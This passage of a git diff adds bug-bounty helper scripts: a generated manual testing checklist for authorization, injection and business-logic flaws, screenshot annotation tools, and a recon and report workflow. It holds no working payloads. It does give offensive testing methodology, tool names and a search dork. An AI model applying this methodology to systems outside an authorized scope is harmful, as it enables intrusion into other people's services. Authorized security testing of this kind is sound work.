|
||||||
|
- [ ] WebSocket messages
|
||||||
|
- [ ] GraphQL queries
|
||||||
|
|
||||||
|
### 2. How/Where does the app talk about users?
|
||||||
|
**Find user identifiers for IDOR/Authorization testing:**
|
||||||
|
- [ ] User IDs in URLs
|
||||||
|
- [ ] UUIDs
|
||||||
|
- [ ] Email addresses
|
||||||
|
- [ ] Usernames
|
||||||
|
- [ ] Session tokens
|
||||||
|
- [ ] JWT tokens (decode and analyze!)
|
||||||
|
|
||||||
|
**Tip:** IDOR → XSS chain for higher severity!
|
||||||
|
|
||||||
|
### 3. Does the site have multi-tenancy or user levels?
|
||||||
|
**Test for authorization bugs:**
|
||||||
|
- [ ] Regular user vs Admin
|
||||||
|
- [ ] Free tier vs Premium tier
|
||||||
|
- [ ] Organization A vs Organization B
|
||||||
|
- [ ] Test horizontal access (User A → User B data)
|
||||||
|
- [ ] Test vertical access (User → Admin escalation)
|
||||||
|
|
||||||
|
**Use Burp's Autorize extension!**
|
||||||
|
|
||||||
|
### 4. Does the site have a unique threat model?
|
||||||
|
**Beyond PII, look for:**
|
||||||
|
- [ ] API keys and secrets (developer portals)
|
||||||
|
- [ ] Doxing opportunities (social platforms)
|
||||||
|
- [ ] Financial data (payment platforms)
|
||||||
|
- [ ] Healthcare data (HIPAA)
|
||||||
|
|
||||||
|
### 5. Has there been past security research?
|
||||||
|
**Search for previous vulnerabilities:**
|
||||||
|
- [ ] HackerOne disclosed reports
|
||||||
|
- [ ] Bugcrowd disclosures
|
||||||
|
- [ ] CVE databases
|
||||||
|
- [ ] Security researcher blogs
|
||||||
|
- [ ] Conference presentations
|
||||||
|
|
||||||
|
**Google:** `site:hackerone.com "target.com" disclosed`
|
||||||
|
|
||||||
|
### 6. How does the app handle XSS? CSRF? Injection?
|
||||||
|
**Understand defenses:**
|
||||||
|
- [ ] WAF presence (Cloudflare, Akamai, ModSecurity)
|
||||||
|
- [ ] XSS filters (CSP, Chrome Auditor)
|
||||||
|
- [ ] CSRF tokens (present? validated? reusable?)
|
||||||
|
- [ ] Input sanitization
|
||||||
|
- [ ] Output encoding
|
||||||
|
|
||||||
|
**Adaptive Strategy:** Don't waste time on hardened areas - find soft spots!
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 📋 Manual Testing Checklist
|
||||||
|
|
||||||
|
Based on findings, prioritize testing:
|
||||||
|
|
||||||
|
### Phase 1: Quick Wins
|
||||||
|
- [ ] Test all file upload endpoints (if any)
|
||||||
|
- [ ] Check for subdomain takeovers (already scanned)
|
||||||
|
- [ ] Test exposed admin panels (from Nuclei)
|
||||||
|
- [ ] Check for default credentials
|
||||||
|
- [ ] Test open redirects in `?url=` parameters
|
||||||
|
|
||||||
|
### Phase 2: Authorization Testing
|
||||||
|
- [ ] Create 2+ accounts at different privilege levels
|
||||||
|
- [ ] Test IDOR on all endpoints with user identifiers
|
||||||
|
- [ ] Test horizontal access (User A → User B)
|
||||||
|
- [ ] Test vertical access (User → Admin)
|
||||||
|
- [ ] Use Burp Autorize for automated testing
|
||||||
|
|
||||||
|
### Phase 3: Input Validation
|
||||||
|
- [ ] Test XSS in all input fields
|
||||||
|
- [ ] Test SQL injection in parameters
|
||||||
|
- [ ] Test SSRF in URL/webhook parameters
|
||||||
|
- [ ] Test XXE in XML endpoints
|
||||||
|
- [ ] Test SSTI in template fields
|
||||||
|
|
||||||
|
### Phase 4: Business Logic
|
||||||
|
- [ ] Test race conditions (payments, redemptions)
|
||||||
|
- [ ] Test negative quantities
|
||||||
|
- [ ] Test price manipulation
|
||||||
|
- [ ] Test insecure password reset flows
|
||||||
|
|
||||||
|
### Phase 5: Deep Dive
|
||||||
|
- [ ] JavaScript analysis for hidden endpoints
|
||||||
|
- [ ] API testing (hidden methods, versions)
|
||||||
|
- [ ] Session management testing
|
||||||
|
- [ ] CSRF testing
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🛠️ Recommended Tools for Manual Testing
|
||||||
|
|
||||||
|
**Burp Suite Extensions:**
|
||||||
|
- LinkFinder - Parse JS for endpoints
|
||||||
|
- Hunt Scanner RMX - Highlight interesting parameters
|
||||||
|
- Autorize - Automated authorization testing
|
||||||
|
- Burp Bounty - Custom scan checks + Blind XSS
|
||||||
|
|
||||||
|
**Command-line:**
|
||||||
|
- `sqlmap` - SQL injection testing
|
||||||
|
- `ffuf` - Directory/parameter fuzzing (if needed)
|
||||||
|
- `dalfox` - XSS scanner
|
||||||
|
- `nuclei` - CVE and exploit template scanning
|
||||||
|
|
||||||
|
**Remember:** Run aggressive tools ONLY if within bug bounty program rules!
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 📚 Resources
|
||||||
|
|
||||||
|
- [Jason Haddix - The Bug Hunter's Methodology](https://www.youtube.com/watch?v=uKWu6yhnhbQ)
|
||||||
|
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
|
||||||
|
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
|
||||||
|
- [HackerOne Disclosed Reports](https://hackerone.com/hacktivity)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Generated by bb-report-generator v1.0.0**
|
||||||
|
EOF
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓ Report generated:${NC} $REPORT_FILE"
|
||||||
|
echo
|
||||||
|
echo -e "${CYAN}Next steps:${NC}"
|
||||||
|
echo " 1. Read the manual testing guide"
|
||||||
|
echo " 2. Answer 'The Big 6 Questions'"
|
||||||
|
echo " 3. Follow the prioritized testing checklist"
|
||||||
|
echo " 4. Find FEATURES first, then BUGS second!"
|
||||||
67
scripts/pentesting/bb-screenshot
Executable file
67
scripts/pentesting/bb-screenshot
Executable file
|
|
@ -0,0 +1,67 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Bug Bounty Screenshot Helper with Automatic Borders and Annotations
|
||||||
|
# Usage: bb-screenshot.sh [program-name]
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
PROGRAM="${1:-current}"
|
||||||
|
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
|
||||||
|
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
|
||||||
|
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
|
||||||
|
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_screenshot.png"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
GREEN='\033[0;32m'
|
||||||
|
BLUE='\033[0;34m'
|
||||||
|
YELLOW='\033[1;33m'
|
||||||
|
NC='\033[0m'
|
||||||
|
|
||||||
|
# Ensure screenshot directory exists
|
||||||
|
mkdir -p "$SCREENSHOT_DIR"
|
||||||
|
|
||||||
|
echo -e "${BLUE}[+] Bug Bounty Screenshot Tool${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Take your screenshot, annotate as needed, then click Save${NC}"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
# Take screenshot with Flameshot (with annotation tools)
|
||||||
|
flameshot gui -p "$TEMP_FILE"
|
||||||
|
|
||||||
|
# Check if screenshot was actually taken (user might have cancelled)
|
||||||
|
if [[ ! -f "$TEMP_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${GREEN}[✓] Screenshot captured${NC}"
|
||||||
|
echo -e "${BLUE}[+] Adding professional border...${NC}"
|
||||||
|
|
||||||
|
# Add border and shadow using ImageMagick
|
||||||
|
convert "$TEMP_FILE" \
|
||||||
|
-bordercolor '#333333' -border 2 \
|
||||||
|
-bordercolor white -border 10 \
|
||||||
|
-bordercolor '#333333' -border 2 \
|
||||||
|
\( +clone -background black -shadow 80x5+5+5 \) \
|
||||||
|
+swap -background white -layers merge +repage \
|
||||||
|
"$FINAL_FILE"
|
||||||
|
|
||||||
|
# Remove temp file
|
||||||
|
rm "$TEMP_FILE"
|
||||||
|
|
||||||
|
echo -e "${GREEN}[✓] Screenshot saved with border: $FINAL_FILE${NC}"
|
||||||
|
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"
|
||||||
|
|
||||||
|
# Copy filename to clipboard (for easy paste into JSON)
|
||||||
|
echo "screenshots/$(basename "$FINAL_FILE")" | xclip -selection clipboard 2>/dev/null || \
|
||||||
|
echo "screenshots/$(basename "$FINAL_FILE")" | wl-copy 2>/dev/null || \
|
||||||
|
echo -e "${YELLOW}[!] Could not copy to clipboard (install xclip or wl-clipboard)${NC}"
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo -e "${GREEN}Path copied: screenshots/$(basename "$FINAL_FILE")${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON file${NC}"
|
||||||
|
|
||||||
|
# Optional: Open the screenshot to verify
|
||||||
|
if command -v feh &> /dev/null; then
|
||||||
|
feh "$FINAL_FILE" &
|
||||||
|
elif command -v eog &> /dev/null; then
|
||||||
|
eog "$FINAL_FILE" &
|
||||||
|
fi
|
||||||
178
scripts/pentesting/bb-screenshot-annotate
Executable file
178
scripts/pentesting/bb-screenshot-annotate
Executable file
|
|
@ -0,0 +1,178 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Advanced Bug Bounty Screenshot with Pre-made Annotation Templates
|
||||||
|
# Usage: bb-screenshot-annotate.sh <program> <type>
|
||||||
|
# Types: vulnerability, proof, request, response, comparison
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
PROGRAM="${1:-current}"
|
||||||
|
TYPE="${2:-vulnerability}"
|
||||||
|
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
|
||||||
|
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
|
||||||
|
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
|
||||||
|
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_${TYPE}.png"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
RED='\033[0;31m'
|
||||||
|
GREEN='\033[0;32m'
|
||||||
|
BLUE='\033[0;34m'
|
||||||
|
YELLOW='\033[1;33m'
|
||||||
|
NC='\033[0m'
|
||||||
|
|
||||||
|
# Ensure screenshot directory exists
|
||||||
|
mkdir -p "$SCREENSHOT_DIR"
|
||||||
|
|
||||||
|
show_usage() {
|
||||||
|
cat << EOF
|
||||||
|
Bug Bounty Screenshot Annotation Tool
|
||||||
|
|
||||||
|
Usage: bb-screenshot-annotate.sh <program> <type>
|
||||||
|
|
||||||
|
Screenshot Types:
|
||||||
|
vulnerability - Highlighting the vulnerability (red arrows/boxes)
|
||||||
|
proof - Proof of exploitation (green success indicators)
|
||||||
|
request - HTTP request in Burp Suite
|
||||||
|
response - HTTP response showing vulnerability
|
||||||
|
comparison - Before/After comparison
|
||||||
|
evidence - General evidence screenshot
|
||||||
|
|
||||||
|
Examples:
|
||||||
|
bb-screenshot-annotate.sh juice-shop vulnerability
|
||||||
|
bb-screenshot-annotate.sh acme proof
|
||||||
|
bb-screenshot-annotate.sh target request
|
||||||
|
|
||||||
|
Tips:
|
||||||
|
- Use Flameshot's built-in tools for annotation:
|
||||||
|
* Arrow (for pointing)
|
||||||
|
* Rectangle (for highlighting)
|
||||||
|
* Text (for labels)
|
||||||
|
* Pixelate (for redacting sensitive data)
|
||||||
|
- Red for vulnerabilities
|
||||||
|
- Green for successful exploitation
|
||||||
|
- Yellow for important notes
|
||||||
|
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
if [[ "${1:-}" == "-h" ]] || [[ "${1:-}" == "--help" ]]; then
|
||||||
|
show_usage
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Display tips based on screenshot type
|
||||||
|
case "$TYPE" in
|
||||||
|
vulnerability)
|
||||||
|
echo -e "${RED}[!] VULNERABILITY SCREENSHOT${NC}"
|
||||||
|
echo -e "${YELLOW}Tips:${NC}"
|
||||||
|
echo " - Use RED arrows to point at the vulnerability"
|
||||||
|
echo " - Use RED rectangles to highlight affected areas"
|
||||||
|
echo " - Add text labels explaining what's wrong"
|
||||||
|
;;
|
||||||
|
proof)
|
||||||
|
echo -e "${GREEN}[!] PROOF OF EXPLOITATION${NC}"
|
||||||
|
echo -e "${YELLOW}Tips:${NC}"
|
||||||
|
echo " - Show successful exploitation result"
|
||||||
|
echo " - Highlight important output (session cookies, data, etc.)"
|
||||||
|
echo " - Use GREEN to show success"
|
||||||
|
;;
|
||||||
|
request)
|
||||||
|
echo -e "${BLUE}[!] HTTP REQUEST SCREENSHOT${NC}"
|
||||||
|
echo -e "${YELLOW}Tips:${NC}"
|
||||||
|
echo " - Capture Burp Suite request"
|
||||||
|
echo " - Highlight malicious payload in RED"
|
||||||
|
echo " - Show request method and endpoint clearly"
|
||||||
|
;;
|
||||||
|
response)
|
||||||
|
echo -e "${BLUE}[!] HTTP RESPONSE SCREENSHOT${NC}"
|
||||||
|
echo -e "${YELLOW}Tips:${NC}"
|
||||||
|
echo " - Capture server response"
|
||||||
|
echo " - Highlight vulnerability indicators (errors, data leaks)"
|
||||||
|
echo " - Show status code and response headers"
|
||||||
|
;;
|
||||||
|
comparison)
|
||||||
|
echo -e "${YELLOW}[!] BEFORE/AFTER COMPARISON${NC}"
|
||||||
|
echo -e "${YELLOW}Tips:${NC}"
|
||||||
|
echo " - Show side-by-side comparison"
|
||||||
|
echo " - Label 'BEFORE' and 'AFTER' clearly"
|
||||||
|
echo " - Highlight the difference"
|
||||||
|
;;
|
||||||
|
evidence)
|
||||||
|
echo -e "${BLUE}[!] GENERAL EVIDENCE${NC}"
|
||||||
|
echo -e "${YELLOW}Tips:${NC}"
|
||||||
|
echo " - Capture relevant evidence"
|
||||||
|
echo " - Annotate important details"
|
||||||
|
echo " - Keep it clear and professional"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}[-] Unknown type: $TYPE${NC}"
|
||||||
|
echo "Valid types: vulnerability, proof, request, response, comparison, evidence"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo -e "${BLUE}[+] Opening Flameshot...${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Annotate your screenshot, then click Save${NC}"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
# Take screenshot with Flameshot (with annotation tools)
|
||||||
|
flameshot gui -p "$TEMP_FILE"
|
||||||
|
|
||||||
|
# Check if screenshot was actually taken
|
||||||
|
if [[ ! -f "$TEMP_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${GREEN}[✓] Screenshot captured${NC}"
|
||||||
|
echo -e "${BLUE}[+] Adding professional border and shadow...${NC}"
|
||||||
|
|
||||||
|
# Add border based on type
|
||||||
|
case "$TYPE" in
|
||||||
|
vulnerability)
|
||||||
|
BORDER_COLOR='#DC143C' # Crimson red
|
||||||
|
;;
|
||||||
|
proof)
|
||||||
|
BORDER_COLOR='#228B22' # Forest green
|
||||||
|
;;
|
||||||
|
request|response)
|
||||||
|
BORDER_COLOR='#4169E1' # Royal blue
|
||||||
|
;;
|
||||||
|
comparison)
|
||||||
|
BORDER_COLOR='#FF8C00' # Dark orange
|
||||||
|
;;
|
||||||
|
evidence)
|
||||||
|
BORDER_COLOR='#696969' # Dim gray
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
# Add colored border, white mat, outer border, and drop shadow
|
||||||
|
convert "$TEMP_FILE" \
|
||||||
|
-bordercolor "$BORDER_COLOR" -border 3 \
|
||||||
|
-bordercolor white -border 12 \
|
||||||
|
-bordercolor '#333333' -border 1 \
|
||||||
|
\( +clone -background black -shadow 80x5+8+8 \) \
|
||||||
|
+swap -background white -layers merge +repage \
|
||||||
|
"$FINAL_FILE"
|
||||||
|
|
||||||
|
# Remove temp file
|
||||||
|
rm "$TEMP_FILE"
|
||||||
|
|
||||||
|
echo -e "${GREEN}[✓] Screenshot saved: $FINAL_FILE${NC}"
|
||||||
|
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"
|
||||||
|
|
||||||
|
# Copy relative path to clipboard
|
||||||
|
RELATIVE_PATH="screenshots/$(basename "$FINAL_FILE")"
|
||||||
|
echo "$RELATIVE_PATH" | xclip -selection clipboard 2>/dev/null || \
|
||||||
|
echo "$RELATIVE_PATH" | wl-copy 2>/dev/null || \
|
||||||
|
echo -e "${YELLOW}[!] Could not copy to clipboard${NC}"
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo -e "${GREEN}Path: $RELATIVE_PATH${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON:${NC}"
|
||||||
|
echo -e ' "path": "'"$RELATIVE_PATH"'",'
|
||||||
|
|
||||||
|
# Show in file manager
|
||||||
|
if command -v xdg-open &> /dev/null; then
|
||||||
|
xdg-open "$(dirname "$FINAL_FILE")" &
|
||||||
|
fi
|
||||||
52
scripts/pentesting/bb-screenshot-batch
Executable file
52
scripts/pentesting/bb-screenshot-batch
Executable file
|
|
@ -0,0 +1,52 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Batch process existing screenshots with borders
|
||||||
|
# Usage: bb-screenshot-batch.sh <directory>
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
SOURCE_DIR="${1:-.}"
|
||||||
|
OUTPUT_DIR="${SOURCE_DIR}/processed"
|
||||||
|
|
||||||
|
if [[ ! -d "$SOURCE_DIR" ]]; then
|
||||||
|
echo "Error: Directory not found: $SOURCE_DIR"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo "[+] Processing screenshots in: $SOURCE_DIR"
|
||||||
|
echo "[+] Output directory: $OUTPUT_DIR"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
# Find all PNG and JPG images
|
||||||
|
IMAGES=$(find "$SOURCE_DIR" -maxdepth 1 \( -name "*.png" -o -name "*.jpg" -o -name "*.jpeg" \) | sort)
|
||||||
|
|
||||||
|
if [[ -z "$IMAGES" ]]; then
|
||||||
|
echo "[-] No images found in $SOURCE_DIR"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
COUNT=0
|
||||||
|
TOTAL=$(echo "$IMAGES" | wc -l)
|
||||||
|
|
||||||
|
while IFS= read -r IMAGE; do
|
||||||
|
((COUNT++))
|
||||||
|
FILENAME=$(basename "$IMAGE")
|
||||||
|
OUTPUT_FILE="$OUTPUT_DIR/$FILENAME"
|
||||||
|
|
||||||
|
echo "[$COUNT/$TOTAL] Processing: $FILENAME"
|
||||||
|
|
||||||
|
# Add professional border and shadow
|
||||||
|
convert "$IMAGE" \
|
||||||
|
-bordercolor '#333333' -border 2 \
|
||||||
|
-bordercolor white -border 10 \
|
||||||
|
-bordercolor '#333333' -border 2 \
|
||||||
|
\( +clone -background black -shadow 80x5+5+5 \) \
|
||||||
|
+swap -background white -layers merge +repage \
|
||||||
|
"$OUTPUT_FILE"
|
||||||
|
|
||||||
|
done <<< "$IMAGES"
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "[✓] Processed $COUNT images"
|
||||||
|
echo "[✓] Output: $OUTPUT_DIR"
|
||||||
259
scripts/pentesting/bb-workflow
Executable file
259
scripts/pentesting/bb-workflow
Executable file
|
|
@ -0,0 +1,259 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Bug Bounty Workflow Helper
|
||||||
|
# Manages the complete workflow from recon to report
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
PROGRAM="${1:-}"
|
||||||
|
DOMAIN="${2:-}"
|
||||||
|
BB_ROOT="${HOME}/bug-bounty"
|
||||||
|
TEMPLATE_DIR="${HOME}/.claude/context/business/security/bug-bounty"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
RED='\033[0;31m'
|
||||||
|
GREEN='\033[0;32m'
|
||||||
|
YELLOW='\033[1;33m'
|
||||||
|
BLUE='\033[0;34m'
|
||||||
|
NC='\033[0m' # No Color
|
||||||
|
|
||||||
|
show_usage() {
|
||||||
|
cat << EOF
|
||||||
|
Bug Bounty Workflow Helper
|
||||||
|
|
||||||
|
Usage: bb-workflow.sh <command> [args]
|
||||||
|
|
||||||
|
Commands:
|
||||||
|
init <program> <domain> Initialize directory structure for new program
|
||||||
|
recon <program> Run reconnaissance on program
|
||||||
|
test <program> <url> <type> Quick vulnerability test helper
|
||||||
|
screenshot <program> [type] Take annotated screenshot with border
|
||||||
|
report <program> <vuln-id> Generate PDF report from JSON
|
||||||
|
status <program> Show program status and findings
|
||||||
|
|
||||||
|
Examples:
|
||||||
|
bb-workflow.sh init acme acme.com
|
||||||
|
bb-workflow.sh recon acme
|
||||||
|
bb-workflow.sh test acme http://localhost:3002 xss
|
||||||
|
bb-workflow.sh screenshot acme vulnerability
|
||||||
|
bb-workflow.sh report acme acme-xss-001
|
||||||
|
|
||||||
|
Directory Structure:
|
||||||
|
~/bug-bounty/<program>/
|
||||||
|
├── recon/ # Reconnaissance data
|
||||||
|
├── screenshots/ # Evidence screenshots
|
||||||
|
├── discoveries/ # Vulnerability JSON files
|
||||||
|
└── reports/ # Generated PDF reports
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
init_program() {
|
||||||
|
local program="$1"
|
||||||
|
local domain="$2"
|
||||||
|
|
||||||
|
echo -e "${BLUE}[+] Initializing bug bounty program: $program${NC}"
|
||||||
|
|
||||||
|
mkdir -p "$BB_ROOT/$program"/{recon,screenshots,discoveries,reports}
|
||||||
|
|
||||||
|
# Create program info file
|
||||||
|
cat > "$BB_ROOT/$program/info.txt" << EOF
|
||||||
|
Program: $program
|
||||||
|
Domain: $domain
|
||||||
|
Started: $(date +%Y-%m-%d)
|
||||||
|
Platform: [HackerOne/Bugcrowd/Other]
|
||||||
|
Scope: [Add scope notes]
|
||||||
|
|
||||||
|
Rules:
|
||||||
|
- [Add important rules from program policy]
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
- [Add your notes here]
|
||||||
|
EOF
|
||||||
|
|
||||||
|
# Create .gitignore
|
||||||
|
cat > "$BB_ROOT/$program/.gitignore" << EOF
|
||||||
|
# Sensitive bug bounty data
|
||||||
|
screenshots/
|
||||||
|
discoveries/*.json
|
||||||
|
reports/*.pdf
|
||||||
|
recon/
|
||||||
|
|
||||||
|
# Keep directory structure
|
||||||
|
!discoveries/.gitkeep
|
||||||
|
!screenshots/.gitkeep
|
||||||
|
!reports/.gitkeep
|
||||||
|
!recon/.gitkeep
|
||||||
|
EOF
|
||||||
|
|
||||||
|
touch "$BB_ROOT/$program"/{discoveries,screenshots,reports,recon}/.gitkeep
|
||||||
|
|
||||||
|
echo -e "${GREEN}[✓] Program initialized: $BB_ROOT/$program${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Edit info.txt with program details${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
run_recon() {
|
||||||
|
local program="$1"
|
||||||
|
local program_dir="$BB_ROOT/$program"
|
||||||
|
|
||||||
|
if [[ ! -d "$program_dir" ]]; then
|
||||||
|
echo -e "${RED}[-] Program directory not found: $program_dir${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Run: bb-workflow.sh init $program <domain>${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Get domain from info.txt
|
||||||
|
local domain=$(grep "^Domain:" "$program_dir/info.txt" | cut -d' ' -f2)
|
||||||
|
|
||||||
|
if [[ -z "$domain" ]]; then
|
||||||
|
echo -e "${RED}[-] Domain not found in info.txt${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BLUE}[+] Running reconnaissance on $domain${NC}"
|
||||||
|
echo -e "${YELLOW}[!] This will take some time...${NC}"
|
||||||
|
|
||||||
|
cd "$program_dir/recon"
|
||||||
|
|
||||||
|
# Run your existing recon scripts
|
||||||
|
if [[ -x "${HOME}/scripts/passive-recon" ]]; then
|
||||||
|
echo -e "${BLUE}[+] Running passive recon...${NC}"
|
||||||
|
"${HOME}/scripts/passive-recon" "$domain"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ -x "${HOME}/scripts/light-recon" ]]; then
|
||||||
|
echo -e "${BLUE}[+] Running light recon...${NC}"
|
||||||
|
"${HOME}/scripts/light-recon" "$domain"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ -x "${HOME}/scripts/bb-recon" ]]; then
|
||||||
|
echo -e "${BLUE}[+] Running bug bounty recon (safe mode)...${NC}"
|
||||||
|
"${HOME}/scripts/bb-recon" "https://$domain"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${GREEN}[✓] Reconnaissance complete!${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Review results in: $program_dir/recon/${NC}"
|
||||||
|
|
||||||
|
# Generate manual testing guide
|
||||||
|
if [[ -x "${HOME}/scripts/bb-report-generator" ]]; then
|
||||||
|
echo -e "${BLUE}[+] Generating manual testing guide...${NC}"
|
||||||
|
# Find the most recent bb-recon directory
|
||||||
|
latest_recon=$(find . -maxdepth 1 -type d -name "bb-recon-*" -printf '%T@ %p\n' | sort -rn | head -1 | cut -d' ' -f2)
|
||||||
|
if [[ -n "$latest_recon" ]]; then
|
||||||
|
"${HOME}/scripts/bb-report-generator" "$latest_recon"
|
||||||
|
echo -e "${GREEN}[✓] Manual testing guide created!${NC}"
|
||||||
|
echo -e "${CYAN}[*] Read: $latest_recon/manual-testing-guide.md${NC}"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
quick_test() {
|
||||||
|
local program="$1"
|
||||||
|
local url="$2"
|
||||||
|
local type="$3"
|
||||||
|
|
||||||
|
echo -e "${BLUE}[+] Quick vulnerability test: $type${NC}"
|
||||||
|
"${HOME}/scripts/quick-vuln-test.sh" "$url" "$type"
|
||||||
|
}
|
||||||
|
|
||||||
|
take_screenshot() {
|
||||||
|
local program="$1"
|
||||||
|
local type="${2:-evidence}"
|
||||||
|
|
||||||
|
if [[ ! -d "$BB_ROOT/$program" ]]; then
|
||||||
|
echo -e "${RED}[-] Program directory not found: $program${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
"${HOME}/scripts/bb-screenshot-annotate.sh" "$program" "$type"
|
||||||
|
}
|
||||||
|
|
||||||
|
generate_report() {
|
||||||
|
local program="$1"
|
||||||
|
local vuln_id="$2"
|
||||||
|
local program_dir="$BB_ROOT/$program"
|
||||||
|
|
||||||
|
local json_file="$program_dir/discoveries/${vuln_id}.json"
|
||||||
|
local pdf_file="$program_dir/reports/${vuln_id}.pdf"
|
||||||
|
|
||||||
|
if [[ ! -f "$json_file" ]]; then
|
||||||
|
echo -e "${RED}[-] JSON file not found: $json_file${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BLUE}[+] Generating PDF report...${NC}"
|
||||||
|
|
||||||
|
cd "$TEMPLATE_DIR"
|
||||||
|
bun run latex/generate.ts "$json_file" "$pdf_file"
|
||||||
|
|
||||||
|
if [[ -f "$pdf_file" ]]; then
|
||||||
|
echo -e "${GREEN}[✓] Report generated: $pdf_file${NC}"
|
||||||
|
echo -e "${YELLOW}[!] Review before submitting!${NC}"
|
||||||
|
|
||||||
|
# Open PDF (if on desktop with xdg-open)
|
||||||
|
if command -v xdg-open &> /dev/null; then
|
||||||
|
xdg-open "$pdf_file" &
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "${RED}[-] Report generation failed${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
show_status() {
|
||||||
|
local program="$1"
|
||||||
|
local program_dir="$BB_ROOT/$program"
|
||||||
|
|
||||||
|
if [[ ! -d "$program_dir" ]]; then
|
||||||
|
echo -e "${RED}[-] Program not found: $program${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BLUE}=== Bug Bounty Program Status ===${NC}"
|
||||||
|
echo ""
|
||||||
|
cat "$program_dir/info.txt"
|
||||||
|
echo ""
|
||||||
|
echo -e "${BLUE}=== Findings ===${NC}"
|
||||||
|
|
||||||
|
local findings=$(find "$program_dir/discoveries" -name "*.json" -not -name ".gitkeep" | wc -l)
|
||||||
|
local reports=$(find "$program_dir/reports" -name "*.pdf" | wc -l)
|
||||||
|
|
||||||
|
echo "Total findings: $findings"
|
||||||
|
echo "Generated reports: $reports"
|
||||||
|
|
||||||
|
if [[ $findings -gt 0 ]]; then
|
||||||
|
echo ""
|
||||||
|
echo "Discoveries:"
|
||||||
|
ls -1 "$program_dir/discoveries/"*.json 2>/dev/null | xargs -n1 basename || true
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main command router
|
||||||
|
case "${1:-}" in
|
||||||
|
init)
|
||||||
|
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] && show_usage && exit 1
|
||||||
|
init_program "$2" "$3"
|
||||||
|
;;
|
||||||
|
recon)
|
||||||
|
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||||
|
run_recon "$2"
|
||||||
|
;;
|
||||||
|
test)
|
||||||
|
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] || [[ -z "${4:-}" ]] && show_usage && exit 1
|
||||||
|
quick_test "$2" "$3" "$4"
|
||||||
|
;;
